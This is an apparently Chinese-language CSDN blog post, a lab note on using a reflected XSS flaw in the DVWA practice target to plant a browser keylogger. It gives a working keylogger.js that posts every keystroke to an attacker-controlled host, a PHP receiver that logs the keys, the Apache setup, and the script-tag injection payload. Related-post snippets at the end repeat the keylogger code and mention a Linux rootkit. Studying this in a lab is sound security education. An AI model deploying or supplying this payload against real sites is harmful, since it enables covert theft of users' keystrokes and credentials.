利用XSS漏洞实现键盘记录器

最新推荐文章于 2024-06-24 09:00:00 发布
最新推荐文章于 2024-06-24 09:00:00 发布
阅读量1.4k 收藏 6
点赞数 3
分类专栏: Web安全渗透测试笔记 文章标签: XSS Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44110340/article/details/90642834
版权

利用XSS漏洞实现键盘记录器

本实验以反射性的XSS漏洞为例
实验环境:dvwa靶机(ip:192.168.135.140)
kali linux(ip:192.168.135.138)

1.首先开启在kail上开启apache服务

/etc/init.d/apache2 start

在firefox地址栏输入: http://192.168.135.138 或者 http://localhost 检测apache是否开启,看见以下即可
在这里插入图片描述
2.在/var/www/html创建三个文件
(1)keylogger.js【远程js脚本文件】

document.onkeypress = function(evt) {
    evt = evt || window.event
    key = String.fromCharCode(evt.charCode)
    if (key) {
        var http = new XMLHttpRequest();
        var param = encodeURI(key)
        http.open("POST","http://192.168.135.138/keylogger.php",true);
        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        http.send("key="+param);
    }
}

(2)keylogger.php 【用于将键盘上的敲击的记录通过POST传送到keylog.txt中】

<?php
$key = $_POST['key'];
$log = fopen("keylog.txt","a");
fwrite($log,$key);
fclose($log);
?>

(3)keylog.txt 【空文件用于接收键盘的记录】

2.XSS漏洞测试开始
(1)在浏览器访问dvwa靶机并且登录
在这里插入图片描述
(2)在输入框中输入以下代码

<script src="http://192.168.135.138/keylogger.js"></script>

或者使用hackbar插件
在这里插入图片描述
(3)紧接着在这个页面随意敲击键盘并查看keylog.txt是否有记录
在这里插入图片描述
看见以上效果及实验成功。

半只特立独行的猪
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS漏洞利用——键盘记录
cxrpty的博客
02-21 1389
实验环境:DVWA 实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器 实验步骤: 一、在服务器创建一个keylog.php文件获取键盘记录,并将记录写入key.txt中。 php代码如下: <?php $file=fopen("key.txt","a"); if(isset($_REQUEST['key']...
85.网络安全渗透测试—[常规漏洞挖掘与利用篇1]—[xss漏洞挖掘-测试与利用]
qwsn
01-25 5627
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞测试与利用 1、相关概念 2、xss漏洞类型 3、xss漏洞测试 4、xss漏洞利用原理:`盗取COOKIE` 5、xss漏洞利用示例:`盗取COOKIE` 6、xss漏洞利用原理:`基础认证钓鱼` 7、xss漏洞利用示例:`基础认证钓鱼` 8、xss漏洞利用原理:`键盘记录器` 9、xss漏洞利用示例:`键盘记录器` 10、关闭浏览器XSS防护机制 11、思考
XSS跨站脚本攻击之——XSS获取键盘记录
温柔小薛的博客
04-05 497
XSS获取键盘记录 条件比较苛刻 除非对方网站管理员配置了跨域访问否则无法实现 理论 什么是跨域 http:// www. oldboyedu.com :80 / news/index.php 协议 :// 子域名 . 主域名 : 端口 / 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同的域之间请...
7.XSS获取键盘记录(存储型xss)
最新发布
愿听风成曲
06-24 406
协议 子域名 主域名 端口 资源地址当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域我们把不同的域之间请求数据的操作,成为跨域操作。跨域-同源策略而为了安全考虑,所有的浏览器都约定了“同源策略”,同源策略规定,两个不同域名之间不能使用JS进行相互操作。比如:x.com域名下的javascrip并不能操作y.com域下的对象。如果想要跨域操作,则需要管理员进行特殊的配置。
2. XSS- 键盘记录器和反射型XSS
qq_41860876的博客
12-20 459
任务099:XSS- 键盘记录器和反射型XSS 进行xss利用进行键盘记录发送给黑客 黑客的服务器大部分但是用的肉鸡服务器 1 . 创建一个Keylogger.js文件 下面文件内容 意思就是将输入的内容发送给服务器http://192.168.55.26/keylogger.php文件document.onkeypress = function(evt) { evt = evt || win...
键盘记录器
申杰的博客
07-14 661
键盘记录器,神器,不过不能记录qq密码,qq有防护措施,而且360会检测出来。 软件下载地址:http://www.pc6.com/softview/SoftView_64998.html
the_colonel:带有键盘记录器和内置 IRC bot 的实验性 linux 内核模块 (rootkit)
06-09
上校 | | | | Colonel 是一个实验性的 linux 内核模块 (rootkit) 和键盘记录器。 远程通信是通过包含的 IRC 机器人处理的。 上校能够: 记录键盘输入 授予root权限 隐藏文件 隐藏进程 要求: Linux 'vanilla' 内核 >= 2.6.29 – 测试高达 3.2 ##用法####本地要传递命令,请使用包含的程序: ./rtcmd <command>或 echo: echo -n <command> >> /proc/colonel 查看可用命令: ./rtcmd help或cat /proc/colonel 注意:自定义 /proc 文件在 /proc 的内容列表中不可见。 偏僻的 如果在频道中,在所有命令前加上 bot 昵称和: ,即bot-nickname: <command> 。 在私人消息或 DCC 会话中,命令应该
kali渗透学习-Web渗透XSS(二)漏洞利用-键盘记录器,xsser
weixin_43239236的博客
01-23 459
原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 反射型漏洞利用 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上 服务器:kali    客户端 启动apache2服务:service apache2 start 语法: <script src="http://192.168.1.127/keylogger.js"></script> keylogger.js 键盘记录器 需要修改里面的接受地址 document.onkeypress = function(ev
86.网络安全渗透测试—[常规漏洞挖掘与利用篇2]—[xss漏洞利用平台-搭建与测试]
qwsn
01-24 2918
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞利用平台-搭建与测试 1、详细说明 2、下载地址 3、搭建过程 4、测试模块:`基础认证钓鱼`【总是失败】 5、测试默认模块:`窃取cookie`【成功】 6、安装其他模块 7、测试模块:`获取内网 ip`【时好时坏】 8、测试模块:`键盘记录器`【成功】 9、测试模块:`html5截屏`【失败】 10、测试模块:`获取xss02.php页面源码`【成功】 11、总结
xss漏洞原理
现代鲁滨逊的博客
07-24 2611
XSSXSS原理简单介绍漏洞成因XSS分类1.反射型2.存储型3.DOM型XSS危害XSS构造及漏洞利用1.XSS过滤绕过利用<>标记HTML、JavaScript关闭标签利用HTML标签属性执行XSS空格回车Tab绕过过滤利用标签属性进行转码产生事件扰乱XSS过滤规则利用字符编码利用CSS跨站过滤2.其他XSS漏洞XSS防御输入过滤输出编码标签黑白名单过滤代码实体转义httponly防止cookie被盗取总结 参考: XSS跨站脚本攻击原理及代码攻防演示(一)(很大一部分从他那来的,如侵立删)
XSS漏洞简单概述--UGa
qq_52781120的博客
03-20 467
XSS漏洞简单概述–UGa 个人笔记向,请多指点 *简介 XSS作为OWASP TOP 10之一,XSS被称为跨站脚本攻击(Cross-site scripting) ,本来应该缩写为CSS,但是由于和CSS (Cascading Style Sheets,层叠样式脚本)重名,所以更名为XSSXSS(跨站脚本攻击)主要基于javascript(JS)完成恶意的攻击行为。JS可以非常灵活的操作html、css和浏览器,这使得XSS攻击的“想象”空间特别大。 XSS通过将精心构造的代码(J
键盘记录器c++实现
05-30
学习高级软件技术课程,根据自己兴趣所写,可以记录本机上的操作记录,操作时间,并可以扩展到发送到指定地址
C语言实现键盘记录器
10-12
利用Visual Studio 2019,C语言实现键盘记录器,附开发记录说明
C++键盘记录程序代码
01-20
本文实例讲述了C++键盘记录程序。分享给大家供大家参考。具体分析如下: 主程序如下: 就是基于对话框的框架,加个个OnHookKey函数, 代码如下:long CMainDialog::OnHookKey(WPARAM wParam, LPARAM lParam)   //处理自定义消息  {      char szKey[80]={0};      GetKeyNameText(lParam, szKey, 80);      CString strItem;      strItem.Format(“按键:%s\r\n”, szKey);      CString strE
Keylogger:键盘记录器
04-08
键盘记录器 具有C的基本键盘记录程序。绝对是该程序编码更专业。 如果您将此程序编写为更易读和有效的代码,我想看一下代码。 如果要关闭键盘记录器,请在桌面或任何位置中按((Right-Alt)+ y)。 日志文件保存在同一程序目录中。
xss获取键盘记录实验演示
北冥有鱼
04-20 1441
在实验之前,我们首先来了解一下什么事跨域 跨域-同源策略 为什么要有同源策略 没有的话只需要一个url就可以盗取你的信息了,不需要xss漏洞 我们来到pikachu,进入xss的存储型 我们首先来看一下后台,在pikachu xss的后台有键盘记录这么一个目录 我们需要去嵌入一个能够调用我们的远程js的方法 把这段代码放进去,点提交后,这个js就被嵌入到这个页面中了 我们打开控制台...
javascript 键盘记录器
u011625492的专栏
10-31 1104
js 按键记录   var keystring = ""; function $(s){return document.getElementById(s)?document.getElementById(s):s;}  function keypress(e) {   var currKey=0,CapsLock=0,e=e||event;   currKey=e.keyC
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值